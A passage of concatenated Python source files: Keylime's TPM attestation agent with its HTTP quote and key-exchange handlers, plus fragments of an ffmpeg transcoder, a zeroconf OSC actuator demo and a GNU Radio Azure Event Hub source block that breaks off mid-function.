def reformat(name, res, output_name):
cmd = CMD.format(input=name,
bit_rate=30,
fps=60,
res=res,
output=output_name)
return cmd
def main(args):
check_ffmpeg()
if args:
input_name = args
elif len(sys.argv) != 2:
raise FileNotFoundError('You did not enter the file name')
else:
input_name = sys.argv[1]
ffmpeg480 = threading.Thread(target=ffmpeg, args=(input_name, 480))
ffmpeg720 = threading.Thread(target=ffmpeg, args=(input_name, 720))
ffmpeg480.start()
ffmpeg720.start()
print("Start transcoding to 480P and 720P videos.")
ffmpeg480.join()
ffmpeg720.join()
print("All jobs done.")
if __name__ == "__main__":
main("video.mp4")
|
keylime_agent.py
|
#!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
'''
import asyncio
import http.server
import multiprocessing
import platform
import datetime
import signal
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import threading
import base64
import configparser
import uuid
import os
import socket
import sys
import time
import hashlib
import zipfile
import io
import importlib
import shutil
import subprocess
import psutil
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from keylime import config
from keylime import keylime_logging
from keylime import cmd_exec
from keylime import crypto
from keylime import fs_util
from keylime import ima
from keylime import json
from keylime import revocation_notifier
from keylime import registrar_client
from keylime import secure_mount
from keylime import user_utils
from keylime import web_util
from keylime import api_version as keylime_api_version
from keylime.common import algorithms, validators
from keylime.tpm.tpm_main import tpm
from keylime.tpm.tpm_abstract import TPM_Utilities
from keylime.tpm.tpm2_objects import pubkey_from_tpm2b_public
# Configure logger
logger = keylime_logging.init_logging('cloudagent')
# lock required for multithreaded operation
uvLock = threading.Lock()
# Instaniate tpm
tpm_instance = tpm(need_hw_tpm=True)
class Handler(BaseHTTPRequestHandler):
parsed_path = ''
def do_HEAD(self):
"""Not supported"""
web_util.echo_json_response(self, 405, "HEAD not supported")
def do_GET(self):
"""This method services the GET request typically from either the Tenant or the Cloud Verifier.
Only tenant and cloudverifier uri's are supported. Both requests require a nonce parameter.
The Cloud verifier requires an additional mask paramter. If the uri or parameters are incorrect, a 400 response is returned.
"""
logger.info('GET invoked from %s with uri: %s', self.client_address, self.path)
rest_params = web_util.get_restful_params(self.path)
if rest_params is None:
web_util.echo_json_response(
self, 405, "Not Implemented: Use /version, /keys/ or /quotes/ interfaces")
return
if "version" in rest_params:
version_info = {
"supported_version": keylime_api_version.current_version()
}
web_util.echo_json_response(self, 200, "Success", version_info)
return
if not rest_params["api_version"]:
web_util.echo_json_response(self, 400, "API Version not supported")
return
if "keys" in rest_params and rest_params['keys'] == 'verify':
if self.server.K is None:
logger.info('GET key challenge returning 400 response. bootstrap key not available')
web_util.echo_json_response(
self, 400, "Bootstrap key not yet available.")
return
if "challenge" not in rest_params:
logger.info('GET key challenge returning 400 response. No challenge provided')
web_util.echo_json_response(
self, 400, "No challenge provided.")
return
challenge = rest_params['challenge']
response = {}
response['hmac'] = crypto.do_hmac(self.server.K, challenge)
web_util.echo_json_response(self, 200, "Success", response)
logger.info('GET key challenge returning 200 response.')
# If agent pubkey requested
elif "keys" in rest_params and rest_params["keys"] == "pubkey":
response = {}
response['pubkey'] = self.server.rsapublickey_exportable
web_util.echo_json_response(self, 200, "Success", response)
logger.info('GET pubkey returning 200 response.')
return
elif "quotes" in rest_params:
nonce = rest_params.get('nonce', None)
pcrmask = rest_params.get('mask', None)
ima_ml_entry = rest_params.get('ima_ml_entry', '0')
# if the query is not messed up
if nonce is None:
logger.warning('GET quote returning 400 response. nonce not provided as an HTTP parameter in request')
web_util.echo_json_response(
self, 400, "nonce not provided as an HTTP parameter in request")
return
# Sanitization assurance (for tpm.run() tasks below)
if not (nonce.isalnum() and
(pcrmask is None or validators.valid_hex(pcrmask)) and
ima_ml_entry.isalnum()):
logger.warning('GET quote returning 400 response. parameters should be strictly alphanumeric')
web_util.echo_json_response(
self, 400, "parameters should be strictly alphanumeric")
return
if len(nonce) > tpm_instance.MAX_NONCE_SIZE:
logger.warning('GET quote returning 400 response. Nonce is too long (max size %i): %i',
tpm_instance.MAX_NONCE_SIZE, len(nonce))
web_util.echo_json_response(
self, 400, f'Nonce is too long (max size {tpm_instance.MAX_NONCE_SIZE}): {len(nonce)}')
return
# identity quotes are always shallow
hash_alg = tpm_instance.defaults['hash']
if not tpm_instance.is_vtpm() or rest_params["quotes"] == 'identity':
quote = tpm_instance.create_quote(
nonce, self.server.rsapublickey_exportable, pcrmask, hash_alg)
imaMask = pcrmask
# Allow for a partial quote response (without pubkey)
enc_alg = tpm_instance.defaults['encrypt']
sign_alg = tpm_instance.defaults['sign']
if "partial" in rest_params and (rest_params["partial"] is None or rest_params["partial"] == "1"):
response = {
'quote': quote,
'hash_alg': hash_alg,
'enc_alg': enc_alg,
'sign_alg': sign_alg,
}
else:
response = {
'quote': quote,
'hash_alg': hash_alg,
'enc_alg': enc_alg,
'sign_alg': sign_alg,
'pubkey': self.server.rsapublickey_exportable,
}
response['boottime'] = self.server.boottime
# return a measurement list if available
if TPM_Utilities.check_mask(imaMask, config.IMA_PCR):
ima_ml_entry = int(ima_ml_entry)
if ima_ml_entry > self.server.next_ima_ml_entry:
ima_ml_entry = 0
ml, nth_entry, num_entries = ima.read_measurement_list(self.server.ima_log_file, ima_ml_entry)
if num_entries > 0:
response['ima_measurement_list'] = ml
response['ima_measurement_list_entry'] = nth_entry
self.server.next_ima_ml_entry = num_entries
# similar to how IMA log retrievals are triggered by IMA_PCR, we trigger boot logs with MEASUREDBOOT_PCRs
# other possibilities would include adding additional data to rest_params to trigger boot log retrievals
# generally speaking, retrieving the 15Kbytes of a boot log does not seem significant compared to the
# potential Mbytes of an IMA measurement list.
if TPM_Utilities.check_mask(imaMask, config.MEASUREDBOOT_PCRS[0]):
if not self.server.tpm_log_file_data:
logger.warning("TPM2 event log not available: %s", config.MEASUREDBOOT_ML)
else:
response['mb_measurement_list'] = self.server.tpm_log_file_data
web_util.echo_json_response(self, 200, "Success", response)
logger.info('GET %s quote returning 200 response.', rest_params["quotes"])
return
else:
logger.warning('GET returning 400 response. uri not supported: %s', self.path)
web_util.echo_json_response(self, 400, "uri not supported")
return
def do_POST(self):
"""This method services the POST request typically from either the Tenant or the Cloud Verifier.
Only tenant and cloudverifier uri's are supported. Both requests require a nonce parameter.
The Cloud verifier requires an additional mask parameter. If the uri or parameters are incorrect, a 400 response is returned.
"""
rest_params = web_util.get_restful_params(self.path)
if rest_params is None:
web_util.echo_json_response(
self, 405, "Not Implemented: Use /keys/ interface")
return
if not rest_params["api_version"]:
web_util.echo_json_response(self, 400, "API Version not supported")
return
if rest_params.get("keys", None) not in ["ukey", "vkey"]:
web_util.echo_json_response(self, 400, "Only /keys/ukey or /keys/vkey are supported")
return
content_length = int(self.headers.get('Content-Length', 0))
if content_length <= 0:
logger.warning('POST returning 400 response, expected content in message. url: %s', self.path)
web_util.echo_json_response(self, 400, "expected content in message")
return
post_body = self.rfile.read(content_length)
try:
json_body = json.loads(post_body)
b64_encrypted_key = json_body['encrypted_key']
decrypted_key = crypto.rsa_decrypt(
self.server.rsaprivatekey, base64.b64decode(b64_encrypted_key))
except (ValueError, KeyError, TypeError) as e:
logger.warning('POST returning 400 response, could not parse body data: %s', e)
web_util.echo_json_response(self, 400, "content is invalid")
return
have_derived_key = False
if rest_params["keys"] == "ukey":
if 'auth_tag' not in json_body:
logger.warning('POST returning 400 response, U key provided without an auth_tag')
web_util.echo_json_response(self, 400, "auth_tag is missing")
return
self.server.add_U(decrypted_key)
self.server.auth_tag = json_body['auth_tag']
self.server.payload = json_body.get('payload', None)
have_derived_key = self.server.attempt_decryption()
elif rest_params["keys"] == "vkey":
self.server.add_V(decrypted_key)
have_derived_key = self.server.attempt_decryption()
else:
logger.warning('POST returning response. uri not supported: %s', self.path)
web_util.echo_json_response(self, 400, "uri not supported")
return
logger.info('POST of %s key returning 200', ('V', 'U')[rest_params["keys"] == "ukey"])
web_util.echo_json_response(self, 200, "Success")
# no key yet, then we're done
if not have_derived_key:
return
# woo hoo we have a key
# ok lets write out the key now
secdir = secure_mount.mount() # confirm that storage is still securely mounted
# clean out the secure dir of any previous info before we extract files
if os.path.isdir(os.path.join(secdir, "unzipped")):
shutil.rmtree(os.path.join(secdir, "unzipped"))
# write out key file
f = open(secdir + "/" + self.server.enc_keyname, 'w', encoding="utf-8")
f.write(base64.b64encode(self.server.K).decode())
f.close()
# stow the U value for later
tpm_instance.write_key_nvram(self.server.final_U)
# optionally extend a hash of they key and payload into specified PCR
tomeasure = self.server.K
# if we have a good key, now attempt to write out the encrypted payload
dec_path = os.path.join(secdir,
config.get('cloud_agent', "dec_payload_file"))
enc_path = os.path.join(config.WORK_DIR, "encrypted_payload")
dec_payload = None
enc_payload = None
if self.server.payload is not None:
if (not self.server.mtls_cert_enabled and
not config.getboolean('cloud_agent', 'enable_insecure_payload', fallback=False)):
logger.warning('agent mTLS is disabled, and unless "enable_insecure_payload" is set to "True", payloads cannot be deployed')
enc_payload = None
else:
dec_payload = crypto.decrypt(
self.server.payload, bytes(self.server.K))
enc_payload = self.server.payload
elif os.path.exists(enc_path):
# if no payload provided, try to decrypt one from a previous run stored in encrypted_payload
with open(enc_path, 'rb') as f:
enc_payload = f.read()
try:
dec_payload = crypto.decrypt(enc_payload, self.server.K)
logger.info("Decrypted previous payload in %s to %s", enc_path, dec_path)
except Exception as e:
logger.warning("Unable to decrypt previous payload %s with derived key: %s", enc_path, e)
os.remove(enc_path)
enc_payload = None
# also write out encrypted payload to be decrytped next time
if enc_payload is not None:
with open(enc_path, 'wb') as f:
f.write(self.server.payload.encode('utf-8'))
# deal with payload
payload_thread = None
if dec_payload is not None:
tomeasure = tomeasure + dec_payload
# see if payload is a zip
zfio = io.BytesIO(dec_payload)
if config.getboolean('cloud_agent', 'extract_payload_zip') and zipfile.is_zipfile(zfio):
logger.info("Decrypting and unzipping payload to %s/unzipped", secdir)
with zipfile.ZipFile(zfio, 'r')as f:
f.extractall(os.path.join(secdir, "unzipped"))
# run an included script if one has been provided
initscript = config.get('cloud_agent', 'payload_script')
if initscript != "":
def initthread():
env = os.environ.copy()
env['AGENT_UUID'] = self.server.agent_uuid
proc = subprocess.Popen(["/bin/bash", initscript], env=env, shell=False,
cwd=os.path.join(secdir, "unzipped"),
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in iter(proc.stdout.readline, b''):
logger.debug("init-output: %s", line.strip())
# should be a no-op as poll already told us it's done
proc.wait()
if not os.path.exists(
os.path.join(secdir, "unzipped", initscript)):
logger.info("No payload script %s found in %s/unzipped", initscript, secdir)
else:
logger.info("Executing payload script: %s/unzipped/%s", secdir, initscript)
payload_thread = threading.Thread(target=initthread, daemon=True)
else:
logger.info("Decrypting payload to %s", dec_path)
with open(dec_path, 'wb') as f:
f.write(dec_payload)
zfio.close()
# now extend a measurement of the payload and key if there was one
pcr = config.getint('cloud_agent', 'measure_payload_pcr')
if 0 < pcr < 24:
logger.info("extending measurement of payload into PCR %s", pcr)
measured = tpm_instance.hashdigest(tomeasure)
tpm_instance.extendPCR(pcr, measured)
if payload_thread is not None:
payload_thread.start()
return
# pylint: disable=W0622
def log_message(self, format, *args):
return
# consider using PooledProcessMixIn
# https://github.com/muayyad-alsadi/python-PooledProcessMixIn
class CloudAgentHTTPServer(ThreadingMixIn, HTTPServer):
"""Http Server which will handle each request in a separate thread."""
# Do not modify directly unless you acquire uvLock. Set chosen for uniqueness of contained values
u_set = set()
v_set = set()
rsaprivatekey = None
rsapublickey = None
rsapublickey_exportable = None
mtls_cert_path = None
rsakey_path = None
mtls_cert_enabled = False
mtls_cert = None
done = threading.Event()
auth_tag = None
payload = None
enc_keyname = None
K = None
final_U = None
agent_uuid = None
next_ima_ml_entry = 0 # The next IMA log offset the verifier may ask for.
boottime = int(psutil.boot_time())
def __init__(self, server_address, RequestHandlerClass, agent_uuid, contact_ip, ima_log_file, tpm_log_file_data):
"""Constructor overridden to provide ability to pass configuration arguments to the server"""
# Find the locations for the U/V transport and mTLS key and certificate.
# They are either relative to secdir (/var/lib/keylime/secure) or absolute paths.
secdir = secure_mount.mount()
keyname = config.get('cloud_agent', 'rsa_keyname')
if not os.path.isabs(keyname):
keyname = os.path.join(secdir, keyname)
# read or generate the key depending on configuration
if os.path.isfile(keyname):
# read in private key
logger.info("Using existing key in %s", keyname)
f = open(keyname, "rb")
rsa_key = crypto.rsa_import_privkey(f.read())
else:
logger.info("Key for U/V transport and mTLS certificate not found, generating a new one")
rsa_key = crypto.rsa_generate(2048)
with open(keyname, "wb") as f:
f.write(crypto.rsa_export_privkey(rsa_key))
self.rsakey_path = keyname
self.rsaprivatekey = rsa_key
self.rsapublickey_exportable = crypto.rsa_export_pubkey(
self.rsaprivatekey)
self.mtls_cert_enabled = config.getboolean('cloud_agent', 'mtls_cert_enabled', fallback=False)
if self.mtls_cert_enabled:
certname = config.get('cloud_agent', 'mtls_cert')
if not os.path.isabs(certname):
certname = os.path.join(secdir, certname)
if os.path.isfile(certname):
logger.info("Using existing mTLS cert in %s", certname)
with open(certname, "rb") as f:
mtls_cert = x509.load_pem_x509_certificate(f.read(), backend=default_backend())
else:
logger.info("No mTLS certificate found, generating a new one")
agent_ips = [server_address[0]]
if contact_ip is not None:
agent_ips.append(contact_ip)
with open(certname, "wb") as f:
# By default generate a TLS certificate valid for 5 years
valid_util = datetime.datetime.utcnow() + datetime.timedelta(days=(360 * 5))
mtls_cert = crypto.generate_selfsigned_cert(agent_uuid, rsa_key, valid_util, agent_ips)
f.write(mtls_cert.public_bytes(serialization.Encoding.PEM))
self.mtls_cert_path = certname
self.mtls_cert = mtls_cert
else:
self.mtls_cert_path = None
self.mtls_cert = None
logger.info("WARNING: mTLS disabled, Tenant and Verifier will reach out to agent via HTTP")
# attempt to get a U value from the TPM NVRAM
nvram_u = tpm_instance.read_key_nvram()
if nvram_u is not None:
logger.info("Existing U loaded from TPM NVRAM")
self.add_U(nvram_u)
http.server.HTTPServer.__init__(
self, server_address, RequestHandlerClass)
self.enc_keyname = config.get('cloud_agent', 'enc_keyname')
self.agent_uuid = agent_uuid
self.ima_log_file = ima_log_file
self.tpm_log_file_data = tpm_log_file_data
def add_U(self, u):
"""Threadsafe method for adding a U value received from the Tenant
Do not modify u_set of v_set directly.
"""
with uvLock:
# be very careful printing K, U, or V as they leak in logs stored on unprotected disks
if config.INSECURE_DEBUG:
logger.debug("Adding U len %d data:%s", len(u), base64.b64encode(u))
self.u_set.add(u)
def add_V(self, v):
"""Threadsafe method for adding a V value received from the Cloud Verifier
Do not modify u_set of v_set directly.
"""
with uvLock:
# be very careful printing K, U, or V as they leak in logs stored on unprotected disks
if config.INSECURE_DEBUG:
logger.debug("Adding V: %s", base64.b64encode(v))
self.v_set.add(v)
def attempt_decryption(self):
"""On reception of a U or V value, this method is called to attempt the decryption of the Cloud Init script
At least one U and V value must be received in order to attempt encryption. Multiple U and V values are stored
to prevent an attacker from sending U/V values to deny service.
"""
with uvLock:
both_u_and_v_present = False
return_value = False
for u in self.u_set:
for v in self.v_set:
both_u_and_v_present = True
return_value = self.decrypt_check(u, v)
if return_value:
# reset u and v sets
self.u_set = set()
self.v_set = set()
return return_value
# TODO check on whether this happens or not. NVRAM causes trouble
if both_u_and_v_present:
pass
# logger.critical("Possible attack from: " + str(handler.client_address) + ". Both U (potentially stale from TPM NVRAM) and V present but unsuccessful in attempt to decrypt check value.")
return return_value
def decrypt_check(self, decrypted_U, decrypted_V):
"""Decrypt the Cloud init script with the passed U and V values.
This method will access the received auth tag, and may fail if decoy U and V values were received.
Do not call directly unless you acquire uvLock. Returns None if decryption unsuccessful, else returns the
decrypted agent UUID.
"""
if self.auth_tag is None:
return None
if len(decrypted_U) != len(decrypted_V):
logger.warning("Invalid U len %d or V len %d. skipping...", len(decrypted_U), len(decrypted_V))
return None
candidate_key = crypto.strbitxor(decrypted_U, decrypted_V)
# be very careful printing K, U, or V as they leak in logs stored on unprotected disks
if config.INSECURE_DEBUG:
logger.debug("U: %s", base64.b64encode(decrypted_U))
logger.debug("V: %s", base64.b64encode(decrypted_V))
logger.debug("K: %s", base64.b64encode(candidate_key))
logger.debug("auth_tag: %s", self.auth_tag)
ex_mac = crypto.do_hmac(candidate_key, self.agent_uuid)
if ex_mac == self.auth_tag:
logger.info("Successfully derived K for UUID %s", self.agent_uuid)
self.final_U = decrypted_U
self.K = candidate_key
return True
logger.error("Failed to derive K for UUID %s", self.agent_uuid)
return False
def revocation_listener():
"""
This configures and starts the revocation listener. It is designed to be started in a separate process.
"""
if config.has_option('cloud_agent', 'listen_notifications'):
if not config.getboolean('cloud_agent', 'listen_notifications'):
return
# keep old typo "listen_notfications" around for a few versions
if config.has_option('cloud_agent', 'listen_notfications'):
logger.warning('Option typo "listen_notfications" is deprecated. Please use "listen_notifications" instead.')
if not config.getboolean('cloud_agent', 'listen_notfications'):
return
secdir = secure_mount.mount()
cert_path = config.get('cloud_agent', 'revocation_cert')
if cert_path == "default":
cert_path = os.path.join(secdir,
"unzipped/RevocationNotifier-cert.crt")
elif cert_path[0] != '/':
# if it is a relative, convert to absolute in work_dir
cert_path = os.path.abspath(
os.path.join(config.WORK_DIR, cert_path))
# Callback function handling the revocations
def perform_actions(revocation):
actionlist = []
# load the actions from inside the keylime module
actionlisttxt = config.get('cloud_agent', 'revocation_actions')
if actionlisttxt.strip() != "":
actionlist = actionlisttxt.split(',')
actionlist = [f"revocation_actions.{i}" % i for i in actionlist]
# load actions from unzipped
action_list_path = os.path.join(secdir, "unzipped/action_list")
if os.path.exists(action_list_path):
with open(action_list_path, encoding="utf-8") as f:
actionlisttxt = f.read()
if actionlisttxt.strip() != "":
localactions = actionlisttxt.strip().split(',')
for action in localactions:
if not action.startswith('local_action_'):
logger.warning("Invalid local action: %s. Must start with local_action_", action)
else:
actionlist.append(action)
uzpath = os.path.join(secdir, "unzipped")
if uzpath not in sys.path:
sys.path.append(uzpath)
for action in actionlist:
logger.info("Executing revocation action %s", action)
try:
module = importlib.import_module(action)
execute = getattr(module, 'execute')
asyncio.get_event_loop().run_until_complete(execute(revocation))
except Exception as e:
logger.warning("Exception during execution of revocation action %s: %s", action, e)
try:
while True:
try:
revocation_notifier.await_notifications(
perform_actions, revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warning("No connection to revocation server, retrying in 10s...")
time.sleep(10)
except (KeyboardInterrupt, SystemExit):
logger.info("Stopping revocation listener...")
def main():
for ML in [config.MEASUREDBOOT_ML, config.IMA_ML]:
if not os.access(ML, os.F_OK):
logger.warning("Measurement list path %s not accessible by agent. Any attempt to instruct it to access this path - via \"keylime_tenant\" CLI - will result in agent process dying", ML)
ima_log_file = None
if os.path.exists(config.IMA_ML):
ima_log_file = open(config.IMA_ML, 'r', encoding="utf-8")
tpm_log_file_data = None
if os.path.exists(config.MEASUREDBOOT_ML):
with open(config.MEASUREDBOOT_ML, 'rb') as tpm_log_file:
tpm_log_file_data = base64.b64encode(tpm_log_file.read())
if config.get('cloud_agent', 'agent_uuid') == 'dmidecode':
if os.getuid() != 0:
raise RuntimeError('agent_uuid is configured to use dmidecode, '
'but current process is not running as root.')
cmd = ['which', 'dmidecode']
ret = cmd_exec.run(cmd, raiseOnError=False)
if ret['code'] != 0:
raise RuntimeError('agent_uuid is configured to use dmidecode, '
'but it\'s is not found on the system.')
# initialize the tmpfs partition to store keys if it isn't already available
secdir = secure_mount.mount()
# Now that operations requiring root privileges are done, drop privileges
# if 'run_as' is available in the configuration.
if os.getuid() == 0:
run_as = config.get('cloud_agent', 'run_as', fallback='')
if run_as != '':
user_utils.chown(secdir, run_as)
user_utils.change_uidgid(run_as)
logger.info("Dropped privileges to %s", run_as)
else:
logger.warning("Cannot drop privileges since 'run_as' is empty or missing in keylime.conf agent section.")
# Instanitate TPM class
instance_tpm = tpm()
# get params for initialization
registrar_ip = config.get('cloud_agent', 'registrar_ip')
registrar_port = config.get('cloud_agent', 'registrar_port')
# get params for the verifier to contact the agent
contact_ip = os.getenv("KEYLIME_AGENT_CONTACT_IP", None)
if contact_ip is None and config.has_option('cloud_agent', 'agent_contact_ip'):
contact_ip = config.get('cloud_agent', 'agent_contact_ip')
contact_port = os.getenv("KEYLIME_AGENT_CONTACT_PORT", None)
if contact_port is None and config.has_option('cloud_agent', 'agent_contact_port'):
contact_port = config.get('cloud_agent', 'agent_contact_port', fallback="invalid")
# change dir to working dir
fs_util.ch_dir(config.WORK_DIR)
# set a conservative general umask
os.umask(0o077)
# initialize tpm
(ekcert, ek_tpm, aik_tpm) = instance_tpm.tpm_init(self_activate=False, config_pw=config.get(
'cloud_agent', 'tpm_ownerpassword')) # this tells initialize not to self activate the AIK
virtual_agent = instance_tpm.is_vtpm()
# Warn if kernel version is <5.10 and another algorithm than SHA1 is used,
# because otherwise IMA will not work
kernel_version = tuple(platform.release().split("-")[0].split("."))
if tuple(map(int,kernel_version)) < (5, 10, 0) and instance_tpm.defaults["hash"] != algorithms.Hash.SHA1:
logger.warning("IMA attestation only works on kernel versions <5.10 with SHA1 as hash algorithm. "
"Even if ascii_runtime_measurements shows \"%s\" as the "
"algorithm, it might be just padding zeros", (instance_tpm.defaults["hash"]))
if ekcert is None:
if virtual_agent:
ekcert = 'virtual'
elif instance_tpm.is_emulator():
ekcert = 'emulator'
# now we need the UUID
try:
agent_uuid = config.get('cloud_agent', 'agent_uuid')
except configparser.NoOptionError:
agent_uuid = None
if agent_uuid == 'hash_ek':
ek_pubkey = pubkey_from_tpm2b_public(base64.b64decode(ek_tpm))
ek_pubkey_pem = ek_pubkey.public_bytes(encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo)
agent_uuid = hashlib.sha256(ek_pubkey_pem).hexdigest()
elif agent_uuid == 'generate' or agent_uuid is None:
agent_uuid = str(uuid.uuid4())
elif agent_uuid == 'dmidecode':
cmd = ['dmidecode', '-s', 'system-uuid']
ret = cmd_exec.run(cmd)
sys_uuid = ret['retout'][0].decode('utf-8')
agent_uuid = sys_uuid.strip()
try:
uuid.UUID(agent_uuid)
except ValueError as e:
raise RuntimeError(f"The UUID returned from dmidecode is invalid: {str(e)}") # pylint: disable=raise-missing-from
elif agent_uuid == 'hostname':
agent_uuid = socket.getfqdn()
elif agent_uuid == 'environment':
agent_uuid = os.getenv("KEYLIME_AGENT_UUID", None)
if agent_uuid is None:
raise RuntimeError("Env variable KEYLIME_AGENT_UUID is empty, but agent_uuid is set to 'environment'")
elif not validators.valid_uuid(agent_uuid):
raise RuntimeError("The UUID is not valid")
if not validators.valid_agent_id(agent_uuid):
raise RuntimeError("The agent ID set via agent uuid parameter use invalid characters")
if config.STUB_VTPM and config.TPM_CANNED_VALUES is not None:
# Use canned values for stubbing
jsonIn = config.TPM_CANNED_VALUES
if "add_vtpm_to_group" in jsonIn:
# The value we're looking for has been canned!
agent_uuid = jsonIn['add_vtpm_to_group']['retout']
else:
# Our command hasn't been canned!
raise Exception("Command add_vtpm_to_group not found in canned json!")
logger.info("Agent UUID: %s", agent_uuid)
serveraddr = (config.get('cloud_agent', 'cloudagent_ip'),
config.getint('cloud_agent', 'cloudagent_port'))
keylime_ca = config.get('cloud_agent', 'keylime_ca')
if keylime_ca == "default":
keylime_ca = os.path.join(config.WORK_DIR, 'cv_ca', 'cacert.crt')
server = CloudAgentHTTPServer(serveraddr, Handler, agent_uuid, contact_ip, ima_log_file, tpm_log_file_data)
if server.mtls_cert_enabled:
context = web_util.generate_mtls_context(server.mtls_cert_path, server.rsakey_path, keylime_ca, logger=logger)
server.socket = context.wrap_socket(server.socket, server_side=True)
else:
if not config.getboolean('cloud_agent', 'enable_insecure_payload', fallback=False) and config.get('cloud_agent', 'payload_script') != "":
raise RuntimeError('agent mTLS is disabled, while a tenant can instruct the agent to execute code on the node. '
'In order to allow the running of the agent, "enable_insecure_payload" has to be set to "True"')
serverthread = threading.Thread(target=server.serve_forever, daemon=True)
# register it and get back a blob
mtls_cert = "disabled"
if server.mtls_cert:
mtls_cert = server.mtls_cert.public_bytes(serialization.Encoding.PEM)
keyblob = registrar_client.doRegisterAgent(
registrar_ip, registrar_port, agent_uuid, ek_tpm, ekcert, aik_tpm, mtls_cert, contact_ip, contact_port)
if keyblob is None:
instance_tpm.flush_keys()
raise Exception("Registration failed")
# get the ephemeral registrar key
key = instance_tpm.activate_identity(keyblob)
if key is None:
instance_tpm.flush_keys()
raise Exception("Activation failed")
# tell the registrar server we know the key
retval = registrar_client.doActivateAgent(
registrar_ip, registrar_port, agent_uuid, key)
if not retval:
instance_tpm.flush_keys()
raise Exception("Registration failed on activate")
# Start revocation listener in a new process to not interfere with tornado
revocation_process = multiprocessing.Process(target=revocation_listener, daemon=True)
revocation_process.start()
logger.info("Starting Cloud Agent on %s:%s with API version %s. Use <Ctrl-C> to stop", serveraddr[0], serveraddr[1], keylime_api_version.current_version())
serverthread.start()
def shutdown_handler(*_):
logger.info("TERM Signal received, shutting down...")
logger.debug("Stopping revocation notifier...")
revocation_process.terminate()
logger.debug("Shutting down HTTP server...")
server.shutdown()
server.server_close()
serverthread.join()
logger.debug("HTTP server stopped...")
revocation_process.join()
logger.debug("Revocation notifier stopped...")
secure_mount.umount()
logger.debug("Umounting directories...")
instance_tpm.flush_keys()
logger.debug("Flushed keys successfully")
sys.exit(0)
signal.signal(signal.SIGTERM, shutdown_handler)
signal.signal(signal.SIGQUIT, shutdown_handler)
signal.signal(signal.SIGINT, shutdown_handler)
# Keep the main thread alive by waiting for the server thread
serverthread.join()
|
PythonActuator.py
|
#!/usr/bin/env python
"https://github.com/jstasiak/python-zeroconf/blob/master/examples/registration.py"
from multiprocessing import Process
""" Example of announcing a service (in this case, a fake HTTP server) """
import logging
import socket
import ifaddr
import sys
from time import sleep
import numpy as np
import matplotlib
matplotlib.use('Qt5Agg')
import matplotlib.pyplot as plt
from matplotlib import animation
print(plt.get_backend())
from zeroconf import ServiceInfo, Zeroconf
from typing import List
from multiprocessing import Process, Manager
__copyright__ = "Copyright 2019, RISE Research Institutes of Sweden"
__author__ = "Naveed Anwar Bhatti and Martina Brachmann"
motor_values = Manager().list()
def get_all_addresses() -> List[str]:
return list(set(
addr.ip
for iface in ifaddr.get_adapters()
for addr in iface.ips
if addr.is_IPv4 and addr.network_prefix != 32 # Host only netmask 255.255.255.255
))
def get_local_ip(starts_with="192"):
list_ip = get_all_addresses()
local_ip = [i for i in list_ip if i.startswith(starts_with)]
return local_ip[0]
def save_motor_value(unused_addr, args, motor):
args[1].append(motor)
def get_motor_value():
if len(motor_values) > 1:
return motor_values.pop(0)
else:
return motor_values[0]
def animate(frameno, p1):
p1[0].set_height(get_motor_value())
return p1
def run_OSC(motor_values_):
from pythonosc import dispatcher
from pythonosc import osc_server
dispatcher = dispatcher.Dispatcher()
dispatcher.map("/motor", save_motor_value, "Motor", motor_values_)
server = osc_server.ThreadingOSCUDPServer((server_ip, 3335), dispatcher)
print("Serving OSC on {}".format(server.server_address))
server.serve_forever()
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
if len(sys.argv) > 1:
assert sys.argv[1:] == ['--debug']
logging.getLogger('zeroconf').setLevel(logging.DEBUG)
initial_motor_state = np.random.randint(0, 100+1)
print("Initial motor state: %s" % initial_motor_state)
save_motor_value(None, [None, motor_values], initial_motor_state)
desc = {'actuator1': '/motor:0%100'}
info = ServiceInfo(type_="_osc._udp.local.",
name="PythonActuator._osc._udp.local.",
address=socket.inet_aton(get_local_ip()),
port=3335,
weight=0,
priority=0,
properties=desc,
server="PythonActuator.local.")
zeroconf = Zeroconf()
print("Registration of a service PythonActuator")
zeroconf.register_service(info)
print("Opening a TCP connection")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print(get_local_ip())
s.bind((str(get_local_ip()), 5555))
s.listen()
conn, addr = s.accept()
print("Connection address: " + str(addr))
while True:
data = conn.recv(20)
if not data:
break
server_ip = str(data.decode())
print("Server IP is: " + server_ip)
P1 = Process(target=run_OSC, args=[motor_values])
P1.start()
fig, ax = plt.subplots()
p1 = plt.bar(0, initial_motor_state, color='b')
ax.set_ylim(0, 100)
anim = animation.FuncAnimation(fig, animate, interval=0, frames=None, fargs=[p1], repeat=False, blit=True)
plt.show()
try:
while True:
pass
except KeyboardInterrupt:
pass
finally:
print("Unregistering...")
zeroconf.unregister_service(info)
zeroconf.close()
|
eventhub_detect_source.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from gnuradio import gr
from azure.eventhub import EventHubConsumerClient
from azure.schemaregistry import SchemaRegistryClient
from azure.schemaregistry.serializer.avroserializer import SchemaRegistryAvroSerializer
from azure.identity import DefaultAzureCredential
from eventhubs import models
import threading
import pmt
schema_content = models.EventHubDataFrame.avro_schema()
class eventhub_detect_source(gr.sync_block):
def __init__(self,connection_str: str = None,
endpoint: str = None, schema_group: str = None, eventhub_name: str = None, consumer_group: str = None, starting_position = None):
gr.sync_block.__init__(self,
name="eventhub_detect_source",
in_sig=[],
out_sig=[])
self.token_credential = DefaultAzureCredential()
self.endpoint = endpoint
self.schema_group = schema_group
self.eventhub_connection_str = connection_str
self.eventhub_name = eventhub_name
self.consumer_group = consumer_group
self.starting_position = starting_position
self.schema_registry_client = SchemaRegistryClient(self.endpoint, self.token_credential)
self.avro_serializer = SchemaRegistryAvroSerializer(self.schema_registry_client, self.schema_group)
self.eventhub_consumer = EventHubConsumerClient.from_connection_string(
conn_str=self.eventhub_connection_str,
consumer_group=self.consumer_group,
eventhub_name=self.eventhub_name)
self.message_port_register_out(pmt.intern('out'))
self.rxthread = threading.Thread(target=self.receive)
self.rxthread.start()
def receive(self):
